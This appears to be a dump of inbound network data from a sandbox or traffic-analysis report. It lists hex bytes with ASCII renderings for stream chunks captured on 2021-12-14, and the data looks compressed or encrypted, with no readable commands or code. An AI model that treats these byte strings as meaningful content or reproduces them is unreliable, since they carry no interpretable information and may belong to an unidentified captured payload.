52 37 1c d1 3f 9d 0c a1 f4 52 64 15 8f bd 8c 7c ca ad Data Ascii: ;@ivG9tF\|N>!)Arv3xqlZrZQ_['LJXR@Snn}r5HRKO'MlA[{C[IfK\<~R=DlX-}2/X"60.:~Vi`so8p9My9R7?Rd\|
2021-12-14 12:42:36 UTC	151	IN	Data Raw: 73 b9 57 3a be 61 39 1d 51 7d 07 11 7a 49 83 cf 6a a8 26 20 20 c8 3e dc eb 69 df d5 59 1a 56 89 7f 6c dc c5 da a7 2c 20 db 9d a6 f6 9b c0 35 e4 d5 3c d3 cd 2a 10 1e 11 1c e2 43 32 ac 19 f8 4d e0 ad bd 2c e1 a4 98 55 6b 51 c5 e2 c0 a6 d9 57 19 55 58 e6 a5 7a b8 35 c6 29 68 0e e7 53 ad 02 5f 40 d7 fa 80 ae a3 62 9c c7 a1 e6 13 9d 28 8e ce cf 5b 63 71 b5 ef 03 e1 c1 c8 f1 24 0b b4 be 27 a1 63 2e fb 65 2e ee 49 0f 5b 7b 4f e2 50 0a 31 a4 08 e2 9d a1 fa 81 71 2b bf b2 85 6a 62 c2 7d 49 70 6b 32 fe b5 ab 7b 3f a9 15 ac 89 ef 8c 38 33 b2 a5 d9 7f 98 21 e2 5d 35 9e 99 14 8e db b5 7d 59 fa 10 b0 aa 4f 5c 7f 91 b1 bf 94 18 02 0b 66 6d d8 36 0b 2a a9 7a f5 4f ea 00 50 c9 1b b8 d6 b2 57 87 de f7 2e 43 e6 e8 21 fd f1 0d f3 2b 24 7f 6f 3f 2c 59 34 ac b4 b8 50 bb 0b f7 Data Ascii: sW:a9Q}zIj& >iYVl, 5<C2M,UkQWUXz5)hS_@b([cq$'c.e.I[{OP1q+jb}Ipk2{?83!]5}YO\fm6zOPW.C!+$o?,Y4P
2021-12-14 12:42:36 UTC	152	IN	Data Raw: fc 9c 0c 7a 60 3e 32 53 65 93 22 b1 3d e8 07 ee b8 6a 7d bb b2 1b b9 bf 2c 19 e5 7a 02 11 39 d5 f2 b2 f0 6f 93 25 46 c1 b0 e3 c8 d9 3b 54 90 01 54 90 4c 61 74 3d 96 a3 84 5f 1d 74 61 6c 26 77 d3 43 e3 62 f9 9e 6a f3 30 d2 b2 80 6d e6 1f 1e c5 d7 df 0b 26 a3 ea 8b 29 9a 81 eb 30 2c 48 b5 9e 86 6b 3f 13 1e 37 82 58 32 40 eb 7f 22 fd 29 6b 67 79 0a d6 ab e9 87 8d 07 f4 f7 b6 64 1a 23 d9 d1 25 55 26 f3 4a 33 ee 0e 19 da 27 00 66 f3 29 00 a8 8d 0e b9 e5 4b 74 cf 09 da 7b 74 9e ff d9 94 a7 2d 73 de dd f6 09 52 b8 df 87 35 9a 25 1f 92 7a 8d 41 89 55 65 08 cc e3 23 dd 3a b3 6e 3f 52 a1 b1 23 37 d1 34 0c 22 1f 20 8b 16 be 52 de d9 fb 7a 8b 41 6c f2 cc 21 3a b6 46 ab 4e 33 a9 eb 54 df 21 ae 73 30 68 88 b9 f3 b7 74 23 01 22 13 d2 f0 56 50 95 8e c8 7f ba be de 7f b8 Data Ascii: z`>2Se"=j},z9o%F;TTLat=_tal&wCbj0m&)0,Hk?7X2@")kgyd#%U&J3'f)Kt{t-sR5%zAUe#:n?R#74" RzAl!:FN3T!s0ht#"VP
2021-12-14 12:42:36 UTC	154	IN	Data Raw: f4 44 2e 7f a4 29 dc 9a 4d 62 7e 72 54 dc 9e 17 c0 36 da 7c 26 f4 2c 4d 5b 5f 6f 54 71 36 11 89 cd 0b c7 5b 7d 35 c5 2d da f6 09 b6 e1 63 26 0a ec 54 62 8f c8 96 f9 85 f6 15 4f 10 1c 1a 0b ea 25 1d fa 55 0e f6 c1 90 80 ac 7c 89 f9 30 8b 74 c2 28 46 25 f3 7f 3e 68 94 a8 cb 46 76 15 5b 3b b1 b9 a8 de 21 79 ac 3d 85 45 aa fa c8 2b d7 3c 8e d6 93 3b 6d 59 36 1c 2f c0 8d f5 b6 00 d5 6f 8f 8d c3 0f 06 12 d0 8e 20 ae cb cb ed 69 17 a5 bd 2b b2 61 15 af 31 19 ed 00 1f 3e 21 55 eb 1c 5c 68 be 07 b4 dc e0 91 ef 5b 21 b6 a6 cc 69 01 f8 27 4e 6d 7e 4e ff 0e 2f b7 d0 49 80 76 1b 26 58 e7 c9 72 21 0b f1 65 ee 3e c4 ea 5c 29 8a 4e 0b 35 fe d9 77 88 79 05 d3 87 b8 59 59 40 7d d6 91 98 8f a4 1a e4 d0 b6 44 85 0e c0 36 b3 f3 7b d0 39 3f 13 80 27 45 57 5b 54 e5 a1 66 b1 98 Data Ascii: D.)Mb~rT6\|&,M[_oTq6[}5-c&TbO%U\|0t(F%>hFv[;!y=E+<;mY6/o i+a1>!U\h[!i'Nm~N/Iv&Xr!e>\)N5wyYY@}D6{9?'EW[Tf
2021-12-14 12:42:36 UTC	155	IN	Data Raw: 61 de d0 d2 b0 f2 9f 94 5b 66 77 96 59 2b 02 89 96 99 eb 46 3c 23 55 0f 6d 02 a6 12 eb 5e 90 99 27 2f 9d bd 47 5b d9 60 56 eb fc 04 83 f2 b3 e0 32 02 42 1c d8 6a df b9 37 58 01 14 1b e8 bd 65 d7 8b 35 e5 d2 c8 b3 01 38 2d f3 d4 b4 81 9f c8 90 15 82 1d 9c 05 57 be 28 86 24 71 47 9f 2c af 5f 93 9a b0 3e 71 f4 b4 c9 46 fd c7 a0 78 2d 50 db f3 db 2e 77 49 4a 71 c4 24 2c 55 aa 58 22 d6 29 21 39 34 5e 92 e5 b8 ee 95 0c 8c a5 cb 3f 5c 62 9a c6 1e 05 65 f4 40 2e f0 01 0f d9 39 1f 9a 3c fe d7 7b 2d cf 6f 1b da e8 53 99 47 ef cb 29 69 5c 60 25 c6 f7 2c 41 18 de 8c 64 04 07 c6 74 ee c6 4f e2 3c 9b 78 ee a6 8d 22 09 c7 51 8f 33 e3 a3 df 34 5a ab bf 45 dc 8b be 94 8e 19 89 59 10 df da c4 44 85 54 09 96 c6 13 7d fb 65 b6 4c 7b e4 b4 0c 90 53 ff 2c 25 1e c3 fe a5 ec 31 Data Ascii: a[fwY+F<#Um^'/G[`V2Bj7Xe58-W($qG,_>qFx-P.wIJq$,UX")!94^?\be@.9<{-oSG)i\`%,AdtO<x"Q34ZEYDT}eL{S,%1
2021-12-14 12:42:36 UTC	156	IN	Data Raw: 07 99 7f b8 63 ae ac 16 34 dd 28 05 54 9d 02 10 c5 73 c0 a4 90 38 b8 4f 1c cd a4 bc e4 d5 5e 41 c9 27 a2 15 f5 a5 35 d5 8e 80 e6 f5 9f b6 f6 c4 48 2f d7 03 82 bf ac 4a bc 5d 66 de 62 44 e6 a4 93 3d bf f5 0e 1f 23 61 86 a1 10 1b 54 65 1b 76 f1 1b 14 fb 3a 43 a6 c8 96 8e b9 36 82 80 06 df 6d 8f 3f 7e 0e e2 5e 40 62 e5 ac d1 65 7a 57 0f 60 ef b6 eb 83 20 3e ef 28 b8 64 b1 ea 9e 78 83 26 8e c0 c3 60 7a 09 d4 85 f9 1c 47 30 2a 8e 0f aa 47 41 14 c0 cb cc 14 58 ac 12 5f 5b 6d b9 c9 3a 3a a9 38 be cf 25 d2 88 75 9a 9f bf bd 83 75 da 83 b3 68 94 4b 02 32 4c 2d d7 ac 26 34 4e a1 fe 7d b2 c0 f6 a0 fb 26 40 3f ac 9f 03 de 7e 42 75 56 e0 95 34 27 76 ac 29 b1 79 db fb 63 28 94 1e 5a 32 e7 c8 6b c1 25 48 88 95 e8 1e 20 0f 3f 80 83 90 c0 fe 45 b2 dc f9 1c d8 79 80 2d a2 Data Ascii: c4(Ts8O^A'5H/J]fbD=#aTev:C6m?~^@bezW` >(dx&`zG0*GAX_[m::8%uuhK2L-&4N}&@?~BuV4'v)yc(Z2k%H ?Ey-
2021-12-14 12:42:36 UTC	157	IN	Data Raw: a4 52 cf 94 27 20 b8 29 7c e2 6b 44 94 37 49 e8 a4 a3 44 74 0b 73 32 40 0e d4 e9 ad 45 80 e0 91 10 7a 4f 3e 98 fd e8 9e 9b a0 89 7f 92 06 9c 39 dd 6a 3c ed b6 35 11 9e 23 20 88 88 75 cc be be 86 43 76 21 64 fa 22 97 fe 68 14 16 13 13 fd c1 09 90 c5 3f ec da d5 b7 19 18 14 e3 a0 d0 ce 86 ab c9 56 df 65 f0 5f 23 ca 56 8a 46 23 04 f9 9b 72 af 76 58 76 b8 9a 2e 21 59 f5 4d 35 4a bf e8 9b 36 18 00 f8 a8 b9 b1 99 3b f5 e5 c6 0a b2 d2 0d ee df e6 c6 d0 14 3c 67 0c 09 f1 43 67 34 fe 9c bc 4d 0d a5 d8 b5 6c c7 ae 72 84 8c 48 f2 ad b8 2a e6 b6 42 7f 99 2c 79 c1 e1 19 bd 58 fd a2 24 5a 7c 31 37 b0 f3 50 08 41 9a f8 1b 44 15 9d 39 ba 91 12 9a 08 c7 07 9d d4 af 7a 58 a9 51 81 38 c5 b8 d3 1d 3e a6 ad 1e b4 95 a0 b0 c3 39 53 f8 b7 6c 7d 6a fb 2b f0 d3 57 60 c6 d9 5a b7 Data Ascii: R' )\|kD7IDts2@EzO>9j<5# uCv!d"h?Ve_#VF#rvXv.!YM5J6;<gCg4MlrH*B,yX$Z\|17PAD9zXQ8>9Sl}j+W`Z
2021-12-14 12:42:36 UTC	159	IN	Data Raw: 6c 5d cc b8 62 9c 6b 4f b6 ee b7 eb 01 62 2c 16 8d cc 6e c8 0f d8 14 02 1b 7e df 35 12 39 97 42 32 8f 49 8e 94 ea 69 e3 04 5a b0 f3 ed aa 8f 1f 45 a6 4f c1 78 9d c8 79 af f3 e8 a9 81 ef c9 85 ae 79 70 b1 42 d0 f9 e1 18 fe 0d 1c ac 30 27 b4 ec d9 6d c8 97 1f 0e aa 80 01 76 b7 85 cb 8e 92 8e 6b c2 80 76 d8 96 6e 03 52 4d 7f 82 22 5f d1 6c 97 2b 87 d4 d4 42 a9 f0 d9 2a 05 6b a6 9b 92 dc a3 30 7e 3f 56 93 c9 25 f0 4a 86 73 30 74 82 00 f0 43 0f 07 93 84 8c c7 9f fa 6f 0a 7b 67 d3 54 ee 33 1e 11 86 b7 b3 55 11 ed 6b 09 1c 03 d9 95 70 60 e3 56 c4 87 40 80 d3 35 81 9a 81 a3 8a 2b 9d ed d0 3e ca 32 5f 73 11 3f a6 ec 7b 71 01 d9 a4 23 ef 87 b0 ee 1a e4 9c f0 77 5c f8 30 da c2 ea c8 7b 40 e8 d0 82 6f f9 66 96 2f 38 92 f0 46 cf 85 a5 08 10 a7 28 f2 96 49 04 3a c2 94 Data Ascii: l]bkOb,n~59B2IiZEOxyypB0'mvkvnRM"_l+B*k0~?V%Js0tCo{gT3Ukp`V@5+>2_s?{q#w\0{@of/8F(I:
2021-12-14 12:42:36 UTC	160	IN	Data Raw: 3a 0b f3 f0 e0 f9 5d 3c b3 f8 b0 10 b0 4e 23 79 c9 e1 19 dc f3 69 7a fe 24 6d e9 28 57 f9 61 3a af fb fd 61 6d 47 27 71 38 23 db e8 f4 06 d8 bf ce 26 25 1d 69 da a5 ad d9 9c 9e 91 72 c4 55 23 d7 0d a5 fd 29 17 c5 d4 58 e8 fd 4f 61 cb 0a 73 62 5f ea cf 92 8e 0b e4 4d 36 a6 ca 92 c0 c6 10 74 a2 1a 4b b8 7f 5c 44 31 d9 e4 f1 24 7d 1d 08 03 09 5d dd 58 ed 78 db 97 77 94 52 8f e4 d0 74 eb 41 fb 1c 01 39 ee d5 7e 36 0a dd 5f 49 28 f2 ac 8b 64 44 47 bf e3 94 9d cb 7a b2 bb 9b 34 d1 89 52 a3 95 b4 e7 87 5a 76 3d 53 1b 8e 06 6b 24 ac d1 fb 0f 4c e6 99 ce 2d 83 fd 7c f9 dc 0b 12 22 5c aa 0e 60 d0 f5 0a c6 a9 4d 6e 85 42 9a 35 74 e1 a9 cf d8 f8 6d 7d d5 87 87 1c 48 fe d5 bb 77 f5 66 4d de 61 c1 30 fc 61 22 50 86 a1 6f d4 5d e5 34 2a 41 c0 a8 2d 5e c2 2d 7f 39 09 09 Data Ascii: :]<N#yiz$m(Wa:amG'q8#&%irU#)XOasb_M6tK\D1$}]XxwRtA9~6_I(dDGz4RZv=Sk$L-\|"\`MnB5tm}HwfMa0a"Po]4*A-^-9
2021-12-14 12:42:36 UTC	161	IN	Data Raw: 92 c6 53 2a 35 f9 92 0f 68 52 15 48 6c 82 89 7b 14 6f 0d d4 bb 27 ac 06 6c f2 e6 ce f8 03 0f 5a 5d c8 9e 15 b6 73 88 ef f2 c9 b8 0e f1 fd e5 52 b6 d5 7d ab 1d 65 3a ad 3b cc a0 68 02 34 66 4d dd 88 4b 8e 24 81 42 10 89 4c 05 19 55 77 43 67 26 1e dd db 42 c3 40 6b 66 d8 60 9b e5 4c f5 b7 78 71 12 e4 78 2a 87 a8 b7 95 1e 6a 96 85 89 d2 8a ff 34 ae f4 37 97 c8 28 1b 38 08 28 fd 49 3b aa 15 e6 76 f2 92 b9 1d 8f de 92 7c 60 09 de c5 d3 98 e4 64 0d 6b 00 f9 a8 6f 8d 17 cc 3d 6c 15 bc 1d aa 5a 4c 4c df 04 36 54 12 69 8d 8b f6 f6 12 9b 6e 9d 8b c7 4a 19 45 86 8a 69 ad 9d 88 a4 77 0c e6 af 36 fb 69 1e d8 07 57 b2 17 04 51 7d 56 f1 5c 1a 24 fb 44 ce ae e1 8d e8 11 76 e6 eb 81 66 12 a5 6e 1c 30 10 7f 9a c3 be 73 53 93 46 bf 9b b0 94 21 42 f7 f0 97 2d ab 30 e2 4a 6e Data Ascii: S5hRHl{o'lZ]sR}e:;h4fMK$BLUwCg&B@kf`Lxqxj47(8(I;v\|`dko=lZLL6TinJEiw6iWQ}V\$Dvfn0sSF!B-0Jn
2021-12-14 12:42:36 UTC	162	IN	Data Raw: db 8c c8 5d 52 d9 97 63 58 31 9e 4b 75 31 92 55 3a 92 bb 35 88 2d 8b f3 44 68 1f ff ef af 64 dc a7 bc 36 44 4a c8 64 87 dd b4 02 9f f1 bd 3a b6 aa 59 99 01 ff 1c 6c f1 a7 7b 31 01 18 2b 87 58 c1 3e cf 51 d7 b5 4c f8 79 b9 4b f8 ca 0f 1e ff 6a 0f 18 87 a9 9f cc b3 ee 3d e1 03 e8 5f 27 b7 c7 01 dc cb 48 af 77 c4 76 bc 83 1e 22 8a 2f 8e ef 17 9a 82 e9 df f2 a7 0e 5c 4d e5 b8 a5 5e e8 28 41 90 27 04 e2 e5 a1 e1 e5 dc 0f 02 97 ab 8e 3b 5a e5 89 85 bc bb 98 46 6e c5 e3 86 a5 2c 05 9b 4e ad 98 4b 41 68 31 d3 ab fb e6 4c 1a 87 38 e8 29 92 9f a2 c8 6f 98 e2 9e 24 ce ac 12 cb 6e 3d 5a c2 5c 8c e7 30 bd b8 fc c0 6f 1d dc 3e b9 12 e3 ad 21 e5 a4 ae fd 8a b1 9b cf e5 39 31 fb 3c 83 9a 99 7a 95 6a 60 fa 6e 6f e1 bf 8d 3c b2 e4 50 4b 04 23 ef c6 32 30 69 3b 28 25 c4 4b Data Ascii: ]RcX1Ku1U:5-Dhd6DJd:Yl{1+X>QLyKj=_'Hwv"/\M^(A';ZFn,NKAh1L8)o$n=Z\0o>!91<zj`no<PK#20i;(%K
2021-12-14 12:42:36 UTC	163	IN	Data Raw: d9 aa d1 fb 80 27 91 dd e4 c2 be 3b 32 8b 7a 27 f6 20 a8 a4 89 98 c8 e1 8a 2d 7f 5d 56 c9 51 5a 25 24 82 b4 42 1f ed e7 af a4 9b c3 a5 f9 6c eb 0b 80 1f 99 1f e9 1a 23 4c 89 0a ad fb 08 97 99 57 75 5b 4a c1 9e 16 7e 43 76 46 31 9f e8 bb 60 ca 60 5e 63 4b 8e 15 28 63 4e 45 26 1d 2b 27 fe 68 f3 51 41 a0 7f b0 f2 13 30 9d 46 77 ef a3 1b 75 7c 12 c8 77 08 79 27 6e 84 70 ab 4a cf 42 71 be fb e6 44 61 61 39 3e ce d5 8e 73 7b 9b d0 12 6f 03 c8 4b 7a 1b 63 12 eb 04 42 5a 23 d0 e9 a4 de fe 67 69 c6 9f d0 45 87 3b 1e af fb eb 05 1b d5 c2 69 ff 25 ca d5 f0 28 da 77 28 8a 1a ef 75 46 fa 0e eb 3d 35 e8 d1 eb 9a f3 86 b5 5e 05 8e 49 f2 96 15 f2 9d 93 a2 46 fb 61 43 3a ca 6f 2a f9 e7 09 ba 9a 3e 0c 87 b2 53 c5 45 a3 81 54 49 0f e9 d8 3b a5 fa 76 af 5d 5e 60 aa d7 3c 98 Data Ascii: ';2z' -]VQZ%$Bl#LWu[J~CvF1``^cK(cNE&+'hQA0Fwu\|wy'npJBqDaa9>s{oKzcBZ#giE;i%(w(uF=5^IFaC:o*>SETI;v]^`<
2021-12-14 12:42:36 UTC	165	IN	Data Raw: d8 43 73 4e 80 4d f9 67 bc 14 ab 53 7b 20 6d 06 e3 67 c9 b7 39 11 b4 ef 6f 7e 38 9f 4b ec 31 17 53 35 86 f4 12 69 3c 81 fc 4c 64 d3 af 52 a0 77 cb b1 a2 a4 5a 5c d0 13 82 34 98 a0 bc e1 89 07 91 8c 53 b9 2e a5 19 8a c2 17 4c 17 70 06 14 7d 64 e7 00 9b 76 7f ac f6 3a bc 3f af 37 5d cc f2 3e b7 c0 1b 4f f4 79 04 67 33 ec a8 c9 25 82 67 6f cc df b0 1d 94 77 85 22 82 56 64 e4 9e 47 16 6f 90 e3 77 70 1d 75 14 58 f6 ac a0 0d 99 57 33 28 7a be 71 d4 a5 14 19 27 49 61 8b 84 1d 0e 6a 21 b9 d3 24 56 2f 39 2a 0e 2b f2 c7 6e 1e 2a a2 cc a4 d3 3a 01 e0 d6 21 94 df 0c 43 6b ec b8 e0 84 4c 9c 3c 38 f2 65 71 2d 17 27 9e 73 f3 b8 78 c8 bd eb 90 ef a3 51 84 f9 e6 ba 50 1b 5d 9e 74 f0 b8 b6 45 67 b4 e8 e4 a9 83 f8 d1 94 a9 69 9f a4 d1 f3 ca cd 22 d4 39 05 b2 09 09 8b 2f e6 Data Ascii: CsNMgS{ mg9o~8K1S5i<LdRwZ\4S.Lp}dv:?7]>Oyg3%gow"VdGowpuXW3(zq'Iaj!$V/9+n:!CkL<8eq-'sxQP]tEgi"9/
2021-12-14 12:42:36 UTC	166	IN	Data Raw: 9c 21 2c 08 6a dd ee 15 75 d4 b6 e4 e5 2d 94 a6 51 41 6e ca cf fb 08 9c ec c7 f6 00 10 ed a8 73 13 f7 0d 77 b9 8d ac a0 cc 55 f6 64 69 62 c4 5c c6 2e 10 d1 be d2 73 e6 d3 a9 af 8b 35 be cd 50 e2 18 6e 3c 20 18 c5 0a e7 4c bd a2 ad 6e 21 b6 c3 f8 6f c3 83 c0 27 e8 68 d6 6e 6f a7 24 c8 ab c2 c2 f6 ba 43 5b 22 20 81 8d 73 55 21 03 2c 9b cf 78 39 74 46 2a 60 a0 53 38 16 4c 59 67 9a 91 1c ad 67 02 c7 5e 0f 1c 0c 63 93 6e 12 db c1 4f ca a1 42 c3 76 72 3d 37 87 05 d2 83 eb 67 65 e0 1e 62 34 d9 b5 d7 6f 72 de f7 04 fa 7d 68 0e fc ec c4 e4 77 6a e5 ab 8e 5d 91 46 29 73 4f eb 16 80 93 fb e4 e8 65 6d ab aa 16 cb 37 0d d7 40 03 72 06 74 48 d2 6b 34 a8 d9 c3 25 75 86 a6 35 44 b7 c4 f5 d2 84 a8 6c 98 a3 02 eb 75 fc bc c7 7e 25 b1 67 9e 14 d0 39 7f 07 a4 46 8d a4 e0 09 Data Ascii: !,ju-QAnswUdib\.s5Pn< Ln!o'hno$C[" sU!,x9tF*`S8LYgg^cnOBvr=7geb4or}hwj]F)sOem7@rtHk4%u5Dlu~%g9F
2021-12-14 12:42:36 UTC	167	IN	Data Raw: 2d 11 d7 4a 01 13 93 47 86 bc 33 14 b0 6a 28 c5 38 de e4 e4 3b 44 66 fe 67 aa f1 f5 51 7d 21 23 ac f0 e4 c9 b5 af 10 83 d8 7d 7e af 9f 02 5b 37 90 ce 31 95 f6 44 0c bd 80 e9 7d 32 95 b9 d4 b4 50 9c 31 66 32 4e 70 86 e2 cc fe 8d 02 eb 6a 7e 06 84 b6 02 39 e3 d3 0e 69 94 19 25 1e 64 2a 42 39 9e ee 15 c6 22 2e 33 7a 2e 92 69 2f 01 18 da de 68 2a 09 ce 5a 56 2e 86 19 27 f9 13 9e a5 71 ec 79 37 89 a0 fe 83 62 ad 74 14 4c 67 f1 af 41 c7 f3 05 f1 77 26 9d e2 37 7c da fa 3d 1b 49 64 88 7f 58 7a 70 e7 f2 41 99 6b 4e 52 70 d2 03 f9 69 12 95 85 e8 8c 28 0a 1b 58 7c 9a 5a 5c 30 7c 22 37 08 e3 16 07 fd 41 ff 04 70 0b 46 fc ed 8a 2e 95 4c 8a 26 0a 13 63 c5 e8 13 15 9c 75 1c f7 7f fa a2 ed 7e 19 1b 62 84 fe e6 2d 9c 7c 42 98 75 65 57 8f fc 60 b6 ff e3 90 98 fa d1 59 af Data Ascii: -JG3j(8;DfgQ}!#}~[71D}2P1f2Npj~9i%dB9".3z.i/hZV.'qy7btLgAw&7\|=IdXzpAkNRpi(X\|Z\0\|"7ApF.L&cu~b-\|BueW`Y
2021-12-14 12:42:36 UTC	168	IN	Data Raw: a6 0c 9e 29 ea 79 4d fe 47 9c be ff 73 b7 f0 bb a3 86 7d 2c 24 68 4d e2 14 e2 4e 30 73 f4 2c 94 0d 4d d9 f3 cb de 93 d2 93 23 ce fa 8d 3d 32 b5 72 93 c5 37 88 33 8d 7d f3 eb 8a eb 65 69 65 4f 51 d5 0f 87 b0 68 4a 62 e7 d3 9c a2 9b b7 bf dc 7f 7a 0a b3 35 2c 05 ef 1a e5 4d 3d 39 ba db ab b6 26 5b 7f 5b 9e c1 27 0c f4 43 65 4e 30 99 09 b3 cc c3 f6 59 69 4b a0 21 97 65 cb 44 d9 0a 22 0c ec 68 3b 75 c6 8b 7b 90 c6 38 12 b9 44 77 98 90 1c 5e ee 12 d3 7f 98 53 2a 67 81 6f 12 50 c9 42 48 a0 54 dc d5 60 2f 3f 97 d4 7b d0 e9 66 65 d8 11 6f 20 df 12 7a 71 61 78 a9 04 42 5c 23 1d fd 0e fb 1e 65 79 e4 fb 83 53 87 58 2f 64 d3 f0 06 64 c7 6a 73 e9 44 73 fd 2a 00 dd 77 f6 97 46 c7 62 46 f6 7c 52 27 33 e8 d6 c5 72 ea e9 bc 26 12 13 30 f4 96 9a fe fd 8e 86 51 9c 7a eb 20 Data Ascii: )yMGs},$hMN0s,M#=2r73}eieOQhJbz5,M=9&[['CeN0YiK!eD"h;u{8Dw^SgoPBHT`/?{feo zqaxB\#eySX/ddjsDswFbF\|R'3r&0Qz
2021-12-14 12:42:36 UTC	170	IN	Data Raw: e0 3e 90 41 16 fe 9d 15 2f 98 e2 59 25 3a 2f d3 28 2d 86 f6 01 15 1a 04 50 d8 a0 14 15 12 39 29 d6 1a d8 f2 7b 2c 86 16 f7 42 bc 4f 29 53 7b 01 6f bd eb 71 c9 ea 37 34 b4 22 fb 7e 38 be 49 4f 39 80 55 68 89 d1 12 64 bd 81 fc 51 64 14 af 44 a0 00 c5 94 a2 83 c2 5c d0 62 80 ff 98 b9 bc f9 88 22 91 ae ce b9 2e d4 1b 01 c0 b1 59 0f 71 23 14 b9 65 e7 00 e9 74 a8 b4 56 1e 4f 3d 8a 37 0c cf f2 3e a9 c0 8a 4c 1c 73 a8 68 16 ec 3f c8 25 82 ed 6c 5d dc 7c 17 87 78 a4 22 94 51 64 e4 80 47 87 6c 68 e9 ce 7f 38 75 36 4f f6 ac be 0d 48 4f 8a 0c 29 bc 54 d4 de 17 19 27 4a 61 1a 87 e5 04 c6 2e 9c d3 68 41 2f 39 34 0e ba f1 04 64 0d 25 87 cc 01 d0 3a 01 fe d6 b8 97 06 06 fd 64 c9 b8 2c 93 4c 9c 22 38 17 7d eb 09 e3 25 bb 73 1c bb 78 c8 a3 eb 38 ec 7c 5b 44 f7 c3 ba 9d 02 Data Ascii: >A/Y%:/(-P9){,BO)S{oq74"~8IO9UhdQdD\b".Yq#etVO=7>Lsh?%l]\|x"QdGlh8u6OHO)T'Ja.hA/94d%:d,L"8}%sx8\|[D
2021-12-14 12:42:36 UTC	171	IN	Data Raw: bf ae 88 b8 9d 3b 06 da a3 3c 2a 99 3a cc 40 77 c0 a5 07 8d d9 42 49 bd ef 6d 8a da 69 73 0d f8 b0 b0 9e 48 2e ff 6a 67 f3 c4 71 4e b0 71 f8 3f 94 f6 44 c9 78 e1 cf 1b 24 90 ee c6 f6 9e 3d 24 b2 c4 17 ef 26 50 a1 8d ac fb e7 99 eb a1 68 d3 cb 7b c4 b7 16 b0 b2 42 6e f4 d3 2e a7 6b 26 95 cd d3 e7 0a 6c 3d 20 16 ef 01 d4 bd ac 13 ab 7b 2e b6 c3 53 73 48 9e 56 26 b6 7c 69 73 be b3 99 e2 bb c0 d0 f6 ce 68 d7 24 0b 81 5d 49 44 23 02 2c 1f ec 24 3c 35 5c a1 6d e0 44 38 16 b0 54 64 98 9c 1a ae 7f 38 c5 6f 18 53 21 6e 91 7c 12 cf cb 99 ca 8a 42 bc 5a 60 3f 36 87 c7 c7 c2 ee f1 7f f2 00 d7 2f d9 b5 72 60 72 dc c0 10 99 5e 09 0c c5 f6 ef f8 67 68 f7 ab 2a 51 4a 42 05 75 ab f7 04 82 c5 7b 60 e9 a4 42 0d 3b 2a cc f7 0f 80 c0 c7 73 55 6a 60 46 fc 31 c2 c7 85 3e e8 80 Data Ascii: ;<:@wBImisH.jgqNq?Dx$=$&Ph{Bn.k&l= {.SsHV&\|ish$]ID#,$<5\mD8Td8oS!n\|BZ`?6/r`r^ghQJBu{`B;*sUj`F1>
2021-12-14 12:42:36 UTC	172	IN	Data Raw: c0 93 20 9d 1e 15 91 1a 93 12 9a 58 03 3f e0 cc 04 e6 36 1e 4c 5f 7f d6 84 7b 4c e2 0d 2a 1f 29 50 21 20 46 d6 4a 03 92 d0 50 81 af 31 13 b8 42 24 9f 3b 94 e4 c7 79 80 4f f8 67 ba fe 47 5e bb 21 23 ab 23 a5 c9 b5 38 11 b2 fa 8f 77 71 9f 04 59 c5 d5 53 37 86 f4 14 84 da 88 3c 51 29 15 af 97 a0 7c ca b1 a4 3b 62 71 f5 66 ce f9 ac 6a bc ea 88 07 97 92 1f 94 d0 d5 55 45 82 dd 4c 1c 71 06 12 b1 19 ef 25 ee 3b ae d8 3c 3a be 3f af 31 04 47 fa c0 ab 8f cc cf 3e 79 06 67 33 ea 37 e7 11 ac ef 3c 1b 6b 64 1d 96 77 81 24 9c 6d 50 7c 80 17 c1 af 47 e3 75 70 1d 73 3e 8f e3 89 b9 5c 4e a3 e0 28 d8 be 71 d2 d6 d9 0c d9 48 30 5c 84 c6 0e 68 21 b9 d5 60 5a 31 1c 33 5c fc c6 1d 6e 1c 2a a2 ca 09 e5 24 ff fc 84 fe d4 28 0c 46 6b ec be 24 00 43 b2 20 6b 11 11 80 2d 12 27 9e Data Ascii: X?6L_{L)P! FJP1B$;yOgG^!##8wqYS7<Q)\|;bqfjUELq%;<:?1G>yg37<kdw$mP\|Gups>\N(qH0\h!`Z13\n$(Fk$C k-'
2021-12-14 12:42:36 UTC	173	IN	Data Raw: cb d8 a0 c1 33 4a 63 4d 05 6e da 92 d9 b8 30 0e 88 d6 af 57 9a ed 28 7e 26 a7 cc 3b b3 2b f4 d7 77 d1 86 76 9e 77 35 78 4d fe 47 8c be 7e 75 1e f8 c1 a3 52 a6 2d 24 68 4d f5 0c 5b 6a 93 52 89 2c b4 8a 4c d9 73 cb c9 ab 0f b4 c7 e5 87 8d 49 b5 b4 72 13 c5 27 b0 8a a9 fc d8 96 8a a7 ed 68 65 cf 51 c5 2f 87 b0 a1 42 1f e7 eb 16 a3 9b 37 bf cc 5f fb 0c 7f 3d 51 05 a3 91 e4 4d bd 39 ba fb ab b6 b5 70 02 5b 3e 4a 26 0c 74 43 65 6e 30 99 74 98 b1 c3 42 7b 69 4b 20 21 87 5d 72 60 30 02 5d 0c 64 e4 3a 75 46 8b 0b b3 c6 38 96 91 25 77 78 1c 1d 5e 6e 12 c3 47 21 77 32 6e e0 6f 09 dd c8 42 c8 a0 24 ff 32 71 2c 36 f6 d4 ed 03 e8 66 65 d8 44 6c a1 d9 4b 73 11 61 e4 7b 05 42 5c 23 1d e5 d8 cb 7e 67 19 e4 07 6e 52 87 58 2f 63 d3 7a 04 a9 e1 0a 73 e9 ab 72 fd 2a 00 da 77 Data Ascii: 3JcMn0W(~&;+wvw5xMG~uR-$hM[jR,LsIr'heQ/B7_=QM9p[>J&tCen0tB{iK !]r`0]d:uF8%wx^nG!w2noB$2q,6feDlKsa{B\#~gnRX/czsr*w
2021-12-14 12:42:36 UTC	175	IN	Data Raw: 09 46 78 9b af 99 d1 57 74 3d 7e c6 9a c3 0a 44 a2 71 97 5d 9b 07 e5 b5 09 93 59 8b 00 74 1b 66 cc 79 e0 8a b2 41 16 7e 9d 82 17 21 c6 1e 2a 62 2f 48 61 2c 86 d6 01 15 12 04 50 91 a4 4c 15 74 70 28 d6 3a d8 f2 73 ad 80 f9 fc 1a bc 66 61 52 7b 21 6f bd e3 71 c9 eb 33 6c b4 1e b3 7f 38 9e 49 4f 31 80 55 c3 8d 89 12 bc ca 80 fc 51 64 03 af c5 a6 22 c1 cc a2 4b bb 5d d0 62 80 e8 98 b9 bc 41 a2 7a 91 c6 b5 b8 2e d4 1b 54 c2 0e 4c d7 5b 7b 14 bd 87 e6 00 ea 74 b8 ac 6e 3c ae 34 d2 37 9c 24 f3 3e aa c0 da 4f be 79 8d 77 4e ec 6f 24 